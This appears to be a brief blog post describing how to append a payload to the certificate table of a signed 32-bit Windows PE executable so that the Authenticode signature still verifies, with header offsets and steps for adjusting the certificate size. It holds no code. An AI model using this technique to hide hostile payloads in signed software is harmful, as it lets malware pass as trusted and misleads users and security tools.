The idea is to append the data to the certificate section at the end of the file. A little bit background first:
- How to generate/verify the signature: it hashes the executable and then used to make a digital certificate which is authenticated by some authority. This certificate is attached to the end of the PE executable in certificate table. When the executable is loaded, windows will compute the hash value and compares with the value in the certificate table.
- There are three areas of PE executable are excluded from the hash computation:
- the checkum in the optional windows specific header, 4 bytes
- the certificate table entry in the optional windows specific header. 8 bytes
- The Digital certificat section at the end of the file. Variable length.
How to add the payload to a file without violate the signature:
- PE header offset located at 0x3c, read that offset as pe_offset
- pe_offset will start with "PE\0\0", which is 4 bytes
- From the pe_offset, find out the Certificate Table Entry (after 28 bytes COFF header and other header 120 bytes), so the offset to the pe_offset should be 0x98 (152bytes)
- You can first read the certificate table entry offset (4 bytes), and then the size of the certificate table entry (4 bytes)
- Modify the size if you want to append the data.
- Now seek to the certificate table entry (the absolute location is in the previous certificate table entry offset), change again the certificate size if you modified it.
- Then go to the end of the file and add the new payload.
- Possibly calculate the new checksum of the file.
Note: this is true for 32 bits, and payload needs to be 64bits aligned. All the 32 bits constatnats are little endians.
No comments:
Post a Comment